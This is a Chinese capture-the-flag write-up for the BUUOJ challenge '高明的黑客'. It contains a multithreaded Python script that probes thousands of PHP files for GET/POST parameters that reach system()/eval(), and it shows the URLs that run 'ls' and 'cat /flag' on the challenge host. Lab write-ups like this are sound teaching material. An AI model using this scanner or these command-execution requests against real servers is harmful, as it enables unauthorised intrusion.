web-高明的黑客

前言：

 对于我来说这题确实也有些难度了。做题过程也是困难重重呀，废话不多说进入正题吧！

0X01 解题思路

1. 打开题目链接，提示留了源码备份为www.tar.gz。那么我们就下载看看。
2. 打开压缩包发现有3000多个php文件，试着打开几个php文件，发现代码中存在一些诸如这样的get或post参数会执行system()/eval()/assert()函数，意味着我们可以通过传递参数的方式来执行cmd命令。
   
3. 由于文件太多，于是我们在本地搭建环境（将解压的文件夹放进网站根目录），我使用的是phpstudy，我将解压的src放在了D:\phpstudy\WWW\src我的网站根目录。然后我们使用python脚本来爆破。
4. 经过参考大佬们的脚本以及自己的理解，以下就是我做题时的脚本：

   import os
   import requests
   import re         #引入正则
   import threading   #用于多线程
   import time
   print('开始时间：  '+  time.asctime( time.localtime(time.time()) ))           #格式化输出，开始时间
   s1=threading.Semaphore(100)
   #Semaphore 管理一个计数器，每调用一次 acquire() 方法，计数器就减一，每调用一次 release() 方法，计数器就加一。计时器的值默认为 1
   #计数器的值不能小于 0，当计数器的值为 0 时，调用 acquire() 的线程就会等待，直到 release() 被调用。
   #因此，可以利用这个特性来控制线程数量。
   filePath = r"D:/phpstudy/WWW/src/"        #改变当前的路径
   os.chdir(filePath)			       #改变当前工作目录到指定的路径。
   requests.adapters.DEFAULT_RETRIES = 5	#设置重连次数，防止线程数过高，断开连接
                                               #requests请求发送的次数太多的情况下会报错（max ......）解决办法就是13和17行
   files = os.listdir(filePath)                #读取当前路径下的所有文件名
   session = requests.Session()
   session.keep_alive = False			# 设置连接活跃状态为False
   def get_content(file):
       s1.acquire()				#线程加锁
       print('trying   '+file)
       with open(file,encoding='utf-8') as f:				#打开php文件，提取所有的$_GET和$_POST的参数
               gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))  #从f.read()中匹配get需要传值的名称
               posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
       data = {}						#所有的$_POST
       params = {}					        #所有的$_GET
       for m in gets:
           params[m] = "echo 'mayi077';"
       for n in posts:
           data[n] = "echo 'mayi077';"
       url = 'http://127.0.0.1/src/'+file
       req = session.post(url, data=data, params=params)   #一次性请求所有的GET和POST
       req.encoding = 'utf-8'
       content = req.text
       req.close()				             # 关闭请求  释放内存  切记打开就得关呀
       if "mayi077" in content:			#如果发现有可以利用的参数，继续筛选出具体的参数
           flag = 0
           for a in gets:
               req = session.get(url, params={a:"echo 'mayi077';"})
               content = req.text
               req.close()				# 关闭请求  释放内存  切记打开就得关呀
               if "mayi077" in content:
                   flag = 1
                   print('找到了利用文件： '+file+"  and 找到了利用的参数：%s 且是get请求" %a)
                   print('结束时间：  ' + time.asctime(time.localtime(time.time()))+"\n\n\n\n")
                   break
           if flag != 1:
               for b in posts:
                   req = session.post(url, data={b:"echo 'mayi077';"})
                   content = req.text
                   req.close()		  # 关闭请求  释放内存切记打开就得关呀
                   if "mayi077" in content:
                       print('找到了利用文件： '+file+"  and 找到了利用的参数：%s 且是post请求 " %b)
                       print('结束时间：  ' + time.asctime(time.localtime(time.time()))+"\n\n\n\n")
                       break
       s1.release()   #线程解锁
   
   for i in files:															#加入多线程
      t = threading.Thread(target=get_content, args=(i,))   #注意target=函数，args=(传的值, ) args需要是一个元组
      t.start()   # 开始

5. 跑出来的结果如下：
   
6. 我们尝试着访问: http://d0741499-ca48-4573-a0be-87e07aec30ef.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=ls ../../../../ (至于为什么访问这个，其实也是经过试错的)得到根目录的文件及目录列表：
   
7. 接着我们访问： http://d0741499-ca48-4573-a0be-87e07aec30ef.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag 得到flag：

0X02 自己在解题过程中所遇到的问题

1. 在本地搭建好环境后浏览器访问文件报错无法理解？？ （2个连续的问号），开始也不理解。后面百度了？？，得知他是php7以上才有的，$a=$c??$b;等同于 $a=isset($c)?$c:$b; 。那么我们只要在phpstudy中将版本调到7.0以上，7.0以上需要v14，可自行安装。
2. 脚本的编写，确实现在我还不能独立不参照别人的脚本给编写出来，我真是太菜了，加油努力呀！